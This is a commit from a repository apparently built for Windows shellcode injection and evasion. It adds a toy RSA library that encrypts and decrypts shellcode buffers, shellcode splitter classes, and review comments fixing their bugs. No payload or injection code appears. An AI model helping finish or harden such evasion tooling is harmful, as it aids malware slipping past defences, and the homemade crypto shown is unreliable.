Projects STRLCPY 0xUBypass Commits 20347aff
  • ■ ■ ■ ■ ■ ■
    .gitignore
     1 +## Ignore Visual Studio temporary files, build results, and
     2 +## files generated by popular Visual Studio add-ons.
     3 +##
     4 +## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore
     5 + 
     6 +# User-specific files
     7 +*.rsuser
     8 +*.suo
     9 +*.user
     10 +*.userosscache
     11 +*.sln.docstates
     12 + 
     13 +# User-specific files (MonoDevelop/Xamarin Studio)
     14 +*.userprefs
     15 + 
     16 +# Mono auto generated files
     17 +mono_crash.*
     18 + 
     19 +# Build results
     20 +[Dd]ebug/
     21 +[Dd]ebugPublic/
     22 +[Rr]elease/
     23 +[Rr]eleases/
     24 +x64/
     25 +x86/
     26 +[Ww][Ii][Nn]32/
     27 +[Aa][Rr][Mm]/
     28 +[Aa][Rr][Mm]64/
     29 +bld/
     30 +[Bb]in/
     31 +[Oo]bj/
     32 +[Ll]og/
     33 +[Ll]ogs/
     34 + 
     35 +# Visual Studio 2015/2017 cache/options directory
     36 +.vs/
     37 +# Uncomment if you have tasks that create the project's static files in wwwroot
     38 +#wwwroot/
     39 + 
     40 +# Visual Studio 2017 auto generated files
     41 +Generated\ Files/
     42 + 
     43 +# MSTest test Results
     44 +[Tt]est[Rr]esult*/
     45 +[Bb]uild[Ll]og.*
     46 + 
     47 +# NUnit
     48 +*.VisualState.xml
     49 +TestResult.xml
     50 +nunit-*.xml
     51 + 
     52 +# Build Results of an ATL Project
     53 +[Dd]ebugPS/
     54 +[Rr]eleasePS/
     55 +dlldata.c
     56 + 
     57 +# Benchmark Results
     58 +BenchmarkDotNet.Artifacts/
     59 + 
     60 +# .NET Core
     61 +project.lock.json
     62 +project.fragment.lock.json
     63 +artifacts/
     64 + 
     65 +# ASP.NET Scaffolding
     66 +ScaffoldingReadMe.txt
     67 + 
     68 +# StyleCop
     69 +StyleCopReport.xml
     70 + 
     71 +# Files built by Visual Studio
     72 +*_i.c
     73 +*_p.c
     74 +*_h.h
     75 +*.ilk
     76 +*.meta
     77 +*.obj
     78 +*.iobj
     79 +*.pch
     80 +*.pdb
     81 +*.ipdb
     82 +*.pgc
     83 +*.pgd
     84 +*.rsp
     85 +*.sbr
     86 +*.tlb
     87 +*.tli
     88 +*.tlh
     89 +*.tmp
     90 +*.tmp_proj
     91 +*_wpftmp.csproj
     92 +*.log
     93 +*.tlog
     94 +*.vspscc
     95 +*.vssscc
     96 +.builds
     97 +*.pidb
     98 +*.svclog
     99 +*.scc
     100 + 
     101 +# Chutzpah Test files
     102 +_Chutzpah*
     103 + 
     104 +# Visual C++ cache files
     105 +ipch/
     106 +*.aps
     107 +*.ncb
     108 +*.opendb
     109 +*.opensdf
     110 +*.sdf
     111 +*.cachefile
     112 +*.VC.db
     113 +*.VC.VC.opendb
     114 + 
     115 +# Visual Studio profiler
     116 +*.psess
     117 +*.vsp
     118 +*.vspx
     119 +*.sap
     120 + 
     121 +# Visual Studio Trace Files
     122 +*.e2e
     123 + 
     124 +# TFS 2012 Local Workspace
     125 +$tf/
     126 + 
     127 +# Guidance Automation Toolkit
     128 +*.gpState
     129 + 
     130 +# ReSharper is a .NET coding add-in
     131 +_ReSharper*/
     132 +*.[Rr]e[Ss]harper
     133 +*.DotSettings.user
     134 + 
     135 +# TeamCity is a build add-in
     136 +_TeamCity*
     137 + 
     138 +# DotCover is a Code Coverage Tool
     139 +*.dotCover
     140 + 
     141 +# AxoCover is a Code Coverage Tool
     142 +.axoCover/*
     143 +!.axoCover/settings.json
     144 + 
     145 +# Coverlet is a free, cross platform Code Coverage Tool
     146 +coverage*.json
     147 +coverage*.xml
     148 +coverage*.info
     149 + 
     150 +# Visual Studio code coverage results
     151 +*.coverage
     152 +*.coveragexml
     153 + 
     154 +# NCrunch
     155 +_NCrunch_*
     156 +.*crunch*.local.xml
     157 +nCrunchTemp_*
     158 + 
     159 +# MightyMoose
     160 +*.mm.*
     161 +AutoTest.Net/
     162 + 
     163 +# Web workbench (sass)
     164 +.sass-cache/
     165 + 
     166 +# Installshield output folder
     167 +[Ee]xpress/
     168 + 
     169 +# DocProject is a documentation generator add-in
     170 +DocProject/buildhelp/
     171 +DocProject/Help/*.HxT
     172 +DocProject/Help/*.HxC
     173 +DocProject/Help/*.hhc
     174 +DocProject/Help/*.hhk
     175 +DocProject/Help/*.hhp
     176 +DocProject/Help/Html2
     177 +DocProject/Help/html
     178 + 
     179 +# Click-Once directory
     180 +publish/
     181 + 
     182 +# Publish Web Output
     183 +*.[Pp]ublish.xml
     184 +*.azurePubxml
     185 +# Note: Comment the next line if you want to checkin your web deploy settings,
     186 +# but database connection strings (with potential passwords) will be unencrypted
     187 +*.pubxml
     188 +*.publishproj
     189 + 
     190 +# Microsoft Azure Web App publish settings. Comment the next line if you want to
     191 +# checkin your Azure Web App publish settings, but sensitive information contained
     192 +# in these scripts will be unencrypted
     193 +PublishScripts/
     194 + 
     195 +# NuGet Packages
     196 +*.nupkg
     197 +# NuGet Symbol Packages
     198 +*.snupkg
     199 +# The packages folder can be ignored because of Package Restore
     200 +**/[Pp]ackages/*
     201 +# except build/, which is used as an MSBuild target.
     202 +!**/[Pp]ackages/build/
     203 +# Uncomment if necessary however generally it will be regenerated when needed
     204 +#!**/[Pp]ackages/repositories.config
     205 +# NuGet v3's project.json files produces more ignorable files
     206 +*.nuget.props
     207 +*.nuget.targets
     208 + 
     209 +# Microsoft Azure Build Output
     210 +csx/
     211 +*.build.csdef
     212 + 
     213 +# Microsoft Azure Emulator
     214 +ecf/
     215 +rcf/
     216 + 
     217 +# Windows Store app package directories and files
     218 +AppPackages/
     219 +BundleArtifacts/
     220 +Package.StoreAssociation.xml
     221 +_pkginfo.txt
     222 +*.appx
     223 +*.appxbundle
     224 +*.appxupload
     225 + 
     226 +# Visual Studio cache files
     227 +# files ending in .cache can be ignored
     228 +*.[Cc]ache
     229 +# but keep track of directories ending in .cache
     230 +!?*.[Cc]ache/
     231 + 
     232 +# Others
     233 +ClientBin/
     234 +~$*
     235 +*~
     236 +*.dbmdl
     237 +*.dbproj.schemaview
     238 +*.jfm
     239 +*.pfx
     240 +*.publishsettings
     241 +orleans.codegen.cs
     242 + 
     243 +# Including strong name files can present a security risk
     244 +# (https://github.com/github/gitignore/pull/2483#issue-259490424)
     245 +#*.snk
     246 + 
     247 +# Since there are multiple workflows, uncomment next line to ignore bower_components
     248 +# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
     249 +#bower_components/
     250 + 
     251 +# RIA/Silverlight projects
     252 +Generated_Code/
     253 + 
     254 +# Backup & report files from converting an old project file
     255 +# to a newer Visual Studio version. Backup files are not needed,
     256 +# because we have git ;-)
     257 +_UpgradeReport_Files/
     258 +Backup*/
     259 +UpgradeLog*.XML
     260 +UpgradeLog*.htm
     261 +ServiceFabricBackup/
     262 +*.rptproj.bak
     263 + 
     264 +# SQL Server files
     265 +*.mdf
     266 +*.ldf
     267 +*.ndf
     268 + 
     269 +# Business Intelligence projects
     270 +*.rdl.data
     271 +*.bim.layout
     272 +*.bim_*.settings
     273 +*.rptproj.rsuser
     274 +*- [Bb]ackup.rdl
     275 +*- [Bb]ackup ([0-9]).rdl
     276 +*- [Bb]ackup ([0-9][0-9]).rdl
     277 + 
     278 +# Microsoft Fakes
     279 +FakesAssemblies/
     280 + 
     281 +# GhostDoc plugin setting file
     282 +*.GhostDoc.xml
     283 + 
     284 +# Node.js Tools for Visual Studio
     285 +.ntvs_analysis.dat
     286 +node_modules/
     287 + 
     288 +# Visual Studio 6 build log
     289 +*.plg
     290 + 
     291 +# Visual Studio 6 workspace options file
     292 +*.opt
     293 + 
     294 +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
     295 +*.vbw
     296 + 
     297 +# Visual Studio 6 auto-generated project file (contains which files were open etc.)
     298 +*.vbp
     299 + 
     300 +# Visual Studio 6 workspace and project file (working project files containing files to include in project)
     301 +*.dsw
     302 +*.dsp
     303 + 
     304 +# Visual Studio 6 technical files
     305 +*.ncb
     306 +*.aps
     307 + 
     308 +# Visual Studio LightSwitch build output
     309 +**/*.HTMLClient/GeneratedArtifacts
     310 +**/*.DesktopClient/GeneratedArtifacts
     311 +**/*.DesktopClient/ModelManifest.xml
     312 +**/*.Server/GeneratedArtifacts
     313 +**/*.Server/ModelManifest.xml
     314 +_Pvt_Extensions
     315 + 
     316 +# Paket dependency manager
     317 +.paket/paket.exe
     318 +paket-files/
     319 + 
     320 +# FAKE - F# Make
     321 +.fake/
     322 + 
     323 +# CodeRush personal settings
     324 +.cr/personal
     325 + 
     326 +# Python Tools for Visual Studio (PTVS)
     327 +__pycache__/
     328 +*.pyc
     329 + 
     330 +# Cake - Uncomment if you are using it
     331 +# tools/**
     332 +# !tools/packages.config
     333 + 
     334 +# Tabs Studio
     335 +*.tss
     336 + 
     337 +# Telerik's JustMock configuration file
     338 +*.jmconfig
     339 + 
     340 +# BizTalk build output
     341 +*.btp.cs
     342 +*.btm.cs
     343 +*.odx.cs
     344 +*.xsd.cs
     345 + 
     346 +# OpenCover UI analysis results
     347 +OpenCover/
     348 + 
     349 +# Azure Stream Analytics local run output
     350 +ASALocalRun/
     351 + 
     352 +# MSBuild Binary and Structured Log
     353 +*.binlog
     354 + 
     355 +# NVidia Nsight GPU debugger configuration file
     356 +*.nvuser
     357 + 
     358 +# MFractors (Xamarin productivity tool) working folder
     359 +.mfractor/
     360 + 
     361 +# Local History for Visual Studio
     362 +.localhistory/
     363 + 
     364 +# Visual Studio History (VSHistory) files
     365 +.vshistory/
     366 + 
     367 +# BeatPulse healthcheck temp database
     368 +healthchecksdb
     369 + 
     370 +# Backup folder for Package Reference Convert tool in Visual Studio 2017
     371 +MigrationBackup/
     372 + 
     373 +# Ionide (cross platform F# VS Code tools) working folder
     374 +.ionide/
     375 + 
     376 +# Fody - auto-generated XML schema
     377 +FodyWeavers.xsd
     378 + 
     379 +# VS Code files for those working on multiple tools
     380 +.vscode/*
     381 +!.vscode/settings.json
     382 +!.vscode/tasks.json
     383 +!.vscode/launch.json
     384 +!.vscode/extensions.json
     385 +*.code-workspace
     386 + 
     387 +# Local History for Visual Studio Code
     388 +.history/
     389 + 
     390 +# Windows Installer files from build outputs
     391 +*.cab
     392 +*.msi
     393 +*.msix
     394 +*.msm
     395 +*.msp
     396 + 
     397 +# JetBrains Rider
     398 +*.sln.iml
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/RSA.cpp
     1 +#include"RSA.h"
     2 +#include<iostream>
     3 +#include<time.h>
     4 +#include<stack>
     5 + 
     6 +clock_t start, finish;
     7 +#define TESTTIME(code, module) start = clock(); \
     8 + code \
     9 + finish = clock(); \
     10 + std::cout << "module:" << module " takes " << finish - start << std::endl;
     11 + 
     12 +BigUint math::Gcd(BigUint a, BigUint b) {
     13 + if (a == 0) {
     14 + return b;
     15 + }
     16 + if (a > b) {
     17 + return Gcd(b, a);
     18 + }
     19 + return Gcd(b % a, a);
     20 +}
     21 + 
     22 +void rsa::init() {
     23 + srand(time(NULL));
     24 +}
     25 + 
     26 +int phi(int n)
     27 +{
     28 + float result = n;
     29 + for (int p = 2; p * p <= n; ++p)
     30 + {
     31 + if (n % p == 0)
     32 + {
     33 + while (n % p == 0)
     34 + n /= p;
     35 + result *= (1.0 - (1.0 / (float)p));
     36 + }
     37 + }
     38 + 
     39 + if (n > 1)
     40 + result *= (1.0 - (1.0 / (float)n));
     41 + 
     42 + return (int)result;
     43 +}
     44 + 
     45 +BigUint math::Phi(BigUint e) {
     46 + BigUint result = e;
     47 + 
     48 + for (BigUint p = 2; p * p <= e; p++) {
     49 + if (e % p == 0) {
     50 + while (e % p == 0) {
     51 + e /= p;
     52 + }
     53 + result = result - result / p;
     54 + }
     55 + }
     56 + 
     57 + if (e > 1) {
     58 + result = result - result / e;
     59 + }
     60 + 
     61 + return result;
     62 +}
     63 + 
     64 +BigUint math::Powmod(BigUint n, BigUint e, BigUint m) {
     65 + if (e == 1) return n % m;
     66 + if (e == 0) return 1;
     67 + 
     68 + if ((e & 1) == 1) {
     69 + // y = n ^ e mod m
     70 + // y = ((n mod m) * ((n ^ (e-1) mod m))) mod m
     71 + return ((n % m) * (Powmod(n, e - 1, m))) % m;
     72 + }
     73 + BigUint tmp = Powmod(n, e / 2, m);
     74 + return (tmp * tmp) % m;
     75 +}
     76 + 
     77 +BigUint math::Invert(BigUint a, BigUint n) {
     78 + BigUint result;
     79 + mpz_invert(result.get_mpz_t(), a.get_mpz_t(), n.get_mpz_t());
     80 + return result;
     81 +}
     82 + 
     83 +BigUint math::Lcm(BigUint a, BigUint b) {
     84 + return a * b / Gcd(a, b);
     85 +}
     86 + 
     87 +BigUint repeatMod(BigUint x, BigUint a) {
     88 + BigUint b = x - 1;
     89 + BigUint ans = 1;
     90 + int times = 0;
     91 + while (b > 0) {
     92 + times++;
     93 + if ((b & 1) == 1) {
     94 + ans = ((ans % x) * (a % x)) % x;
     95 + }
     96 + a = a * a % x;
     97 + b >>= 1;
     98 + }
     99 + return ans;
     100 +}
     101 + 
     102 +bool math::IsPrime(BigUint n, int k) {
     103 + //Miller-Rabin
     104 + while (k--) {
     105 + BigUint t = RandomNumber(2, n - 2) + 2;
     106 + while (t % n == 0) {
     107 + t = RandomNumber(2, n - 2) + 2;
     108 + }
     109 + if (repeatMod(n, t) != 1) {
     110 + return false;
     111 + }
     112 + }
     113 + return true;
     114 +}
     115 + 
     116 +BigUint math::RandomNumber(BigUint min, BigUint max) {
     117 + const int random_max = 2 << 14;
     118 + BigUint distance = max - min;
     119 + if (distance == 0) {
     120 + return 0;
     121 + }
     122 + if (distance < random_max) {
     123 + return rand() % distance;
     124 + }
     125 + 
     126 + BigUint result = 0;
     127 + while (distance >= random_max) {
     128 + result = result * random_max + rand();
     129 + distance /= random_max;
     130 + }
     131 + 
     132 + result += min;
     133 + 
     134 + while (result > max) {
     135 + result >>= 1;
     136 + }
     137 + 
     138 + return result;
     139 +}
     140 + 
     141 + 
     142 +BigUint rsa::GeneratePrime(int bits) {
     143 + if (bits == 0) return 0;
     144 + if (bits == 1) return 1;
     145 + 
     146 + BigUint smallest = BigUint(1) << (bits - 1);
     147 + BigUint biggest = (BigUint(1) << bits) - 1;
     148 + BigUint result = math::RandomNumber(smallest, biggest);
     149 + while (!math::IsPrime(result, 40)) {
     150 + //get a rand number greater than smallest
     151 + result = math::RandomNumber(smallest, biggest);
     152 + }
     153 + return result;
     154 +}
     155 + 
     156 +BigUint rsa::GenerateN(BigUint p, BigUint q) {
     157 + return p * q;
     158 +}
     159 + 
     160 +BigUint rsa::GeneratePhi(BigUint p, BigUint q) {
     161 + return (p - 1) * (q - 1);
     162 +}
     163 + 
     164 +BigUint rsa::GenerateE(BigUint phi) {
     165 + BigUint e;
     166 + mpz_sqrt(e.get_mpz_t(), phi.get_mpz_t());
     167 + mpz_sqrt(e.get_mpz_t(), e.get_mpz_t());
     168 + for (; e < phi; e++) {
     169 + if (math::Gcd(e, phi) == 1) {
     170 + return e;
     171 + }
     172 + }
     173 + 
     174 + return 7;
     175 +}
     176 + 
     177 +BigUint rsa::GenerateD(BigUint e, BigUint phi) {
     178 + return math::Invert(e, phi);
     179 +}
     180 + 
     181 +BigUint rsa::Encrypt(BigUint m, BigUint e, BigUint N) {
     182 + BigUint result = 0;
     183 + mpz_powm(result.get_mpz_t(), m.get_mpz_t(), e.get_mpz_t(), N.get_mpz_t());
     184 + return result;
     185 +}
     186 + 
     187 +BigUint rsa::Decrypt(BigUint c, BigUint d, BigUint N) {
     188 + BigUint result = 0;
     189 + mpz_powm(result.get_mpz_t(), c.get_mpz_t(), d.get_mpz_t(), N.get_mpz_t());
     190 + return result;
     191 +}
     192 + 
     193 +void std::Printable2Number(string src, BigUint &ed, BigUint &N) {
     194 + size_t idx = src.find(':');
     195 + if (idx == std::string::npos) {
     196 + return;
     197 + }
     198 + size_t srclen = src.length();
     199 + ed = 0, N = 0;
     200 + for (size_t i = 0; i < idx; i++) {
     201 + ed = ed * PrintableSize + PrintableInvertTable[src[i]];
     202 + }
     203 + for (size_t i = idx + 1; i < srclen; i++) {
     204 + N = N * PrintableSize + PrintableInvertTable[src[i]];
     205 + }
     206 +}
     207 + 
     208 +void std::Number2Printable(string &dst, BigUint ed, BigUint N) {
     209 + stack<uint8_t> num;
     210 + while (ed > 0) {
     211 + BigUint remainder = ed % PrintableSize;
     212 + uint8_t unit = (uint8_t)remainder.get_ui();
     213 + ed /= PrintableSize;
     214 + num.push(PrintableConvertTable[unit]);
     215 + }
     216 + while (!num.empty()) {
     217 + dst += num.top();
     218 + num.pop();
     219 + }
     220 + 
     221 + dst.append(":");
     222 + 
     223 + while (N > 0) {
     224 + BigUint remainder = N % PrintableSize;
     225 + uint8_t unit = (uint8_t)remainder.get_ui();
     226 + N /= PrintableSize;
     227 + num.push(PrintableConvertTable[unit]);
     228 + }
     229 + 
     230 + while (!num.empty()) {
     231 + dst += num.top();
     232 + num.pop();
     233 + }
     234 +}
     235 + 
     236 +void std::GeneratePair(string &private_key, string &public_key) {
     237 + BigUint p = rsa::GeneratePrime(ENCRYPT_KEY_SIZE);
     238 + BigUint q = rsa::GeneratePrime(ENCRYPT_KEY_SIZE);
     239 + BigUint N = rsa::GenerateN(p, q);
     240 + BigUint phi = rsa::GeneratePhi(p, q);
     241 + BigUint e = rsa::GenerateE(phi);
     242 + BigUint d = rsa::GenerateD(e, phi);
     243 + 
     244 + Number2Printable(public_key, e, N);
     245 + Number2Printable(private_key, d, N);
     246 +}
     247 + 
     248 +void P(BigUint src, size_t bits, uint8_t *dst) {
     249 + for (int i = 0; i < bits / 8; i++) {
     250 + BigUint unit = src & 0xff;
     251 + dst[i] = (uint8_t)unit.get_ui();
     252 + src >>= 8;
     253 + }
     254 +}
     255 + 
     256 +void U(uint8_t *src, size_t bits, BigUint &dst) {
     257 + dst = 0;
     258 + for (int i = (bits / 8) - 1; i >= 0; i--) {
     259 + dst = dst * 0x100 + src[i];
     260 + }
     261 +}
     262 + 
     263 +void std::EncryptShell(uint8_t *src, size_t srclen, uint8_t *dst, size_t dstlen, string public_key) {
     264 + BigUint e = 0, N = 0;
     265 + Printable2Number(public_key, e, N);
     266 + 
     267 + //convert char[] to BigUint[]
     268 + BigUint tmp_size = CEIL(srclen, (ENCRYPT_BLOCK_SIZE / 8));
     269 + BigUint *tmp = new BigUint[tmp_size.get_ui()];
     270 + 
     271 + for (BigUint i = 0; i < tmp_size; i++) {
     272 + tmp[i.get_ui()] = 0;
     273 + U(src + (ENCRYPT_BLOCK_SIZE / 8) * i.get_ui(), ENCRYPT_BLOCK_SIZE, tmp[i.get_ui()]);
     274 + }
     275 + 
     276 + //encrypt
     277 + for (BigUint i = 0; i < tmp_size; i++) {
     278 + tmp[i.get_ui()] = rsa::Encrypt(tmp[i.get_ui()], e, N);
     279 + }
     280 + 
     281 + //convert BigUint[] to char[]
     282 + for (BigUint i = 0; i < tmp_size; i++) {
     283 + P(tmp[i.get_ui()], ENCRYPT_DST_SIZE, dst + (ENCRYPT_DST_SIZE / 8) * i.get_ui());
     284 + }
     285 + 
     286 + delete[tmp_size.get_ui()]tmp;
     287 +}
     288 + 
     289 +void std::DecryptShell(uint8_t *src, size_t srclen, uint8_t *dst, size_t dstlen, string private_key) {
     290 + BigUint d = 0, N = 0;
     291 + Printable2Number(private_key, d, N);
     292 + 
     293 + //convert char[] to BigUint[]
     294 + BigUint tmp_size = CEIL(srclen, (ENCRYPT_DST_SIZE / 8));
     295 + BigUint *tmp = new BigUint[tmp_size.get_ui()];
     296 + 
     297 + for (BigUint i = 0; i < tmp_size; i++) {
     298 + tmp[i.get_ui()] = 0;
     299 + U(src + (ENCRYPT_DST_SIZE / 8) * i.get_ui(), ENCRYPT_DST_SIZE, tmp[i.get_ui()]);
     300 + }
     301 + 
     302 + //encrypt
     303 + for (BigUint i = 0; i < tmp_size; i++) {
     304 + tmp[i.get_ui()] = rsa::Decrypt(tmp[i.get_ui()], d, N);
     305 + }
     306 + 
     307 + //convert BigUint[] to char[]
     308 + for (BigUint i = 0; i < tmp_size; i++) {
     309 + P(tmp[i.get_ui()], ENCRYPT_BLOCK_SIZE, dst + (ENCRYPT_BLOCK_SIZE / 8) * i.get_ui());
     310 + }
     311 + 
     312 + delete[tmp_size.get_ui()]tmp;
     313 +}
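Review bot: `math::IsPrime` is commented as Miller-Rabin, but `repeatMod(n, t)` only computes t^(n-1) mod n and compares the result to 1, which is the Fermat test, so a Carmichael number passes for every base coprime to it no matter how large `k` is. Either implement the strong probable-prime check (write n-1 as 2^s·d and test the squaring chain) or call `mpz_probab_prime_p`, since the file already depends on the mpz functions. Separately, `delete[tmp_size.get_ui()]tmp;` in `EncryptShell` and `DecryptShell` is not standard C++ and should be `delete[] tmp;`, and `PrintableInvertTable[src[i]]` in `Printable2Number` indexes with a plain `char`, which is negative for bytes of 0x80 and above where `char` is signed; cast to `unsigned char` and reject characters that are not in the alphabet. The second `//encrypt` comment in `DecryptShell` should read decrypt.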
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/RSA.h
     1 +#pragma once
     2 +#include"mini-gmpxx.h"
     3 +#include<stdint.h>
     4 + 
     5 +#define BigUint mpz_class
     6 + 
     7 +#define ENCRYPT_KEY_SIZE (8 * 8)
     8 +#define ENCRYPT_BLOCK_SIZE (ENCRYPT_KEY_SIZE)
     9 +#define ENCRYPT_DST_SIZE (ENCRYPT_KEY_SIZE * 2)
     10 + 
     11 +#define CEIL(a, b) ((a % b) > 0 ? ((a / b) + 1) : (a / b))
     12 + 
     13 +#define PRINTARR(arr) for(int i = 0; i < sizeof(arr); i++) printf("%02x", arr[i])
     14 + 
     15 +namespace rsa {
     16 + //Generate a prime greater than 2^bits
     17 + BigUint GeneratePrime(int bits);
     18 + 
     19 + //phi equals to (p - 1) * (q - 1);
     20 + BigUint GeneratePhi(BigUint p, BigUint q);
     21 + 
     22 + //Genertae a prime e
     23 + BigUint GenerateE(BigUint phi);
     24 + 
     25 + //ed = 1 (mod phi)
     26 + BigUint GenerateD(BigUint e, BigUint phi);
     27 + 
     28 + //Encrypt
     29 + BigUint Encrypt(BigUint m, BigUint e, BigUint N);
     30 + 
     31 + //Decrypt
     32 + BigUint Decrypt(BigUint c, BigUint d, BigUint N);
     33 + 
     34 + //Generate N equals to p * q;
     35 + BigUint GenerateN(BigUint p, BigUint q);
     36 + 
     37 + void init();
     38 +};
     39 + 
     40 +namespace math {
     41 + //Generate a^-1 mod n
     42 + BigUint Invert(BigUint a, BigUint n);
     43 + 
     44 + //n ^ e mod m
     45 + BigUint Powmod(BigUint n, BigUint e, BigUint m);
     46 + 
     47 + BigUint Phi(BigUint e);
     48 + 
     49 + //Greatest Common Dividor
     50 + BigUint Gcd(BigUint a, BigUint b);
     51 + 
     52 + //Lessest Common
     53 + BigUint Lcm(BigUint a, BigUint b);
     54 + 
     55 + //Test if a number is prime
     56 + bool IsPrime(BigUint n, int k);
     57 + 
     58 + //Generate a random number between min and max
     59 + BigUint RandomNumber(BigUint min, BigUint max);
     60 +};
     61 + 
     62 +namespace std {
     63 + constexpr static char PrintableConvertTable[] = {
     64 + 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'm', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
     65 + 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
     66 + '/', '\\', '?', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', '+', '=', '[', ']', '|', ';', '<', '>', '.', ',', '~', '`',
     67 + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'
     68 + };
     69 + constexpr static char PrintableInvertTable[] = {
     70 + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 55, 0,
     71 + 57, 58, 59, 61, 0, 63, 64, 62, 66, 75, 65, 74, 52, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 0, 71, 72, 67,
     72 + 73, 54, 56, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
     73 + 50, 51, 68, 53, 69, 60, 0, 77, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 0, 14, 15, 16, 17, 18, 19, 20, 21,
     74 + 22, 23, 24, 25, 0, 70, 0, 76, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     75 + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     76 + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     77 + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
     78 + };
     79 + constexpr static int PrintableSize = sizeof(PrintableConvertTable);
     80 + 
     81 + void Printable2Number(string src, BigUint &ed, BigUint &N);
     82 + 
     83 + void Number2Printable(string &dst, BigUint ed, BigUint N);
     84 + 
     85 + void GeneratePair(string &private_key, string &public_key);
     86 + 
     87 + void EncryptShell(uint8_t *src, size_t srclen, uint8_t *dst, size_t dstlen, string public_key);
     88 + 
     89 + void DecryptShell(uint8_t *src, size_t srclen, uint8_t *dst, size_t dstlen, string private_key);
     90 + 
     91 +#define NEEDED_ENCRYPT_LENGTH(SRC_LEN) ((CEIL(SRC_LEN, (ENCRYPT_BLOCK_SIZE / 8)) * (ENCRYPT_DST_SIZE / 8)))
     92 +};
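Review bot: `PrintableConvertTable` lists `'m'` twice (positions 12 and 13) and never `'n'`, while `PrintableInvertTable` maps `'m'` to 13 and `'n'` to 0, so a digit of value 12 is written as `'m'` and read back as 13 and the encoded key does not round-trip. Replace the second `'m'` with `'n'` and set the inverse entries to 12 for `'m'` and 13 for `'n'`. Unknown characters also decode to 0, the same value as `'a'`, so a malformed key string is accepted silently; a sentinel such as -1 would let `Printable2Number` reject it. The tables and functions are declared inside `namespace std`, which is undefined behaviour for user code, and `string` is used without including `<string>`; a project namespace would be safer. The comment on `GeneratePrime` says "greater than 2^bits", but the implementation draws from 2^(bits-1) to 2^bits - 1.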
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/ShellcodeSplitor.cpp
     1 +#include "ShellcodeSplitor.h"
     2 + 
     3 + 
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/ShellcodeSplitor.h
     1 +#pragma once
     2 +#include<Windows.h>
     3 +#include<vector>
     4 + 
     5 +class ShellcodeItem {
     6 +public:
     7 + UINT32 length;
     8 + UINT8 *codes;
     9 + 
     10 + ShellcodeItem(UINT32 length, UINT8 *codes) {
     11 + this->codes = (UINT8 *)malloc(length);
     12 + for (int i = 0; i < length; i++) {
     13 + this->codes[i] = codes[i];
     14 + }
     15 + }
     16 + 
     17 + ~ShellcodeItem() {
     18 + free(codes);
     19 + }
     20 +};
     21 + 
     22 +class ShellcodeContainer {
     23 +public:
     24 + UINT32 size;
     25 + std::vector<ShellcodeItem *> codes;
     26 + 
     27 + void push(ShellcodeItem *);
     28 + 
     29 + ShellcodeItem *pop();
     30 + 
     31 + ~ShellcodeContainer();
     32 +};
     33 + 
     34 +class ShellcodeSplitor {
     35 +private:
     36 + UINT8 *shellcode;
     37 + UINT32 length;
     38 +public:
     39 + ShellcodeSplitor(UINT8 *shellcode, UINT32 length) {
     40 + this->shellcode = (UINT8 *)malloc(length);
     41 + for (int i = 0; i < length; i++) {
     42 + this->shellcode[i] = shellcode[i];
     43 + }
     44 + }
     45 + 
     46 + ~ShellcodeSplitor() {
     47 + if (shellcode != NULL) {
     48 + free(shellcode);
     49 + }
     50 + }
     51 + 
     52 + ShellcodeContainer *split();
     53 +};
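Review bot: neither constructor stores its `length` argument, so `ShellcodeItem::length` and `ShellcodeSplitor::length` stay uninitialized and any later read of them is undefined; add `this->length = length;` in both. The `malloc` results are written to without a NULL check, and the loops compare `int i` against a `UINT32` bound. Both classes own a raw buffer and free it in the destructor but leave the implicit copy constructor and assignment in place, so copying an instance ends in a double free; delete the copy operations or hold the bytes in a `std::vector<UINT8>`. `ShellcodeContainer::push`, `pop`, the destructor and `ShellcodeSplitor::split` are declared here but have no definitions in this commit.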
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector/Utils.cpp
     1 +#include"RSA.h"
     2 +#include"Utils.h"
     3 +#include<iostream>
     4 + 
     5 +/*
     6 +I Just do not understand... there is about 1/8 probability that encrypt would fault, but... why?? signed?
     7 +I tried many ways, but.. ok, I choice a more efficiency way
     8 +*/
     9 +void GenerateKey(std::string &public_key, std::string &private_key) {
     10 + bool flag = false;
     11 + rsa::init();
     12 + while (!flag) {
     13 + flag = true;
     14 + public_key = "";
     15 + private_key = "";
     16 + std::GeneratePair(private_key, public_key);
     17 + uint8_t shellcode[] = {
     18 + 0x12, 0x34, 0x56, 0x78, 0x12, 0x34, 0x56, 0x78,
     19 + 0x12, 0x34, 0x56, 0x78, 0x12, 0x34, 0x56, 0x78
